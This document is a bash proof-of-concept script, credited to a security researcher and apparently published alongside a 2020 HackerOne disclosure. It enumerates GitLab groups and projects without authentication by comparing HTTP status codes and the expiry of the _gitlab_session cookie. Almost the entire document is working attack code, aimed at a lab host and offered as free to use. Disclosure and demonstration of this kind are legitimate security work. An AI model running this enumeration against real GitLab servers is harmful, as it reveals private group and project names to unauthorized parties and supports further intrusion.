Unauthenticated Information Disclosure in Gitlab allows for enumeration/bruteforce of groups and projects
#!/bin/bash
# Script by TheGroundZero (@DezeStijn)
#
# https://sequr.be/blog/2020/06/gitlab-unauthenticated-group-and-project-enumeration/
# https://gist.github.com/TheGroundZero/ea067760fd6c3854238f098cb075bf96
#
# Using a difference in behaviour by Gitlab in setting cookies
# it's possible to enumerate/bruteforce groups/projects
# as an unauthenticated user.
#
# This code was written purely for a demo.
# With some reworking this could work with wordlist files
# and even be multithreaded.
#
# Responsibly disclosed to Gitlab via HackerOne on 2020-06-04
# https://hackerone.com/reports/891055
#
# Free to use, but please do refer to this original gist.
#
# https://github.com/TheGroundZero
# https://twitter.com/DezeStijn/
# https://sequr.be/ | http://sequrx53bdtvizjsbcdibrugpg7fujhvx7b75rvhwh2kq3i4hhvh35qd.onion/
#
# Candidate names to probe, as whitespace-separated lists; the loops at the
# bottom of the script rely on word splitting to walk them.
groups='root grouppublic groupinternal groupprivate'
projects='projectpublic projectinternal projectprivate'
# Base URL of the GitLab instance under test (the author's lab host).
url='http://gitlab.lab.local'
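#######################################
# Print one coloured result line.
# Arguments: $1 - 1 for "exists" (green [+]), anything else for
#                 "does not exist" (red [-])
#            $2 - label to print after the marker (the probed URL)
# Outputs:   one line on stdout
#######################################
print_exists() {
  local flag=${1:-0}
  local label=${2:-}

  # The label is passed as a printf argument, never as part of the format,
  # so whitespace, glob characters and backslashes in a URL are printed
  # literally instead of being split, expanded or interpreted.
  if [ "$flag" -eq 1 ] 2>/dev/null; then
    printf '\033[92m[+]\033[0m %s\n' "$label"
  else
    printf '\033[91m[-]\033[0m %s\n' "$label"
  fi
}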
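#######################################
# Classify one URL as existing or not for an unauthenticated client.
#
# A 200 response means the resource is publicly readable. Otherwise the
# URL is requested again and the expiry column (field 5 of curl's
# Netscape-format cookie jar) of the _gitlab_session cookie is read:
# an expiry greater than 0 is reported as "does not exist", an expiry of 0
# as "exists". That difference in cookie handling is the disclosure the
# header describes; the remedy is server-side (the same cookie behaviour
# for both cases), see the HackerOne report linked in the header.
#
# Arguments: $1 - full URL to test
# Outputs:   one result line via print_exists; a warning on stderr when
#            no usable cookie expiry came back
# Returns:   0 when a result was printed, 1 when the check was inconclusive
#######################################
check_cookie() {
  local target=$1
  local status expire

  status=$(curl -s -o /dev/null -w "%{http_code}" "$target")
  #echo "[i] HTTP code = $status"
  if [ "$status" -eq 200 ] 2>/dev/null; then
    print_exists 1 "$target"
    return 0
  fi

  expire=$(curl --junk-session-cookies --cookie-jar - "$target" 2>/dev/null \
    | awk '/_gitlab_session/ {print $5}')
  #echo "[i] Expire = $expire"

  # No cookie line (connection failure, different server, changed cookie
  # name) used to fall through a failed numeric test and be reported as
  # "exists". Treat anything that is not a plain number as inconclusive.
  case "$expire" in
    '' | *[!0-9]*)
      printf '[!] no _gitlab_session expiry for %s, result inconclusive\n' \
        "$target" >&2
      return 1
      ;;
  esac

  if [ "$expire" -gt 0 ]; then
    print_exists 0 "$target"
  else
    print_exists 1 "$target"
  fi
}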
# Walk every candidate group, then every candidate project beneath it.
# $groups and $projects are left unquoted on purpose: they are
# whitespace-separated lists and word splitting is what iterates them.
# shellcheck disable=SC2086
for group in $groups; do
  printf '[*] Group: %s\n' "$group"
  #echo "[*] Testing: $url/$group"
  check_cookie "${url}/${group}"

  for project in $projects; do
    printf '[*] Project: %s\n' "$project"
    #echo "[*] Testing: $url/$group/$project"
    check_cookie "${url}/${group}/${project}"
  done

  # Blank line between groups.
  printf '\n'
done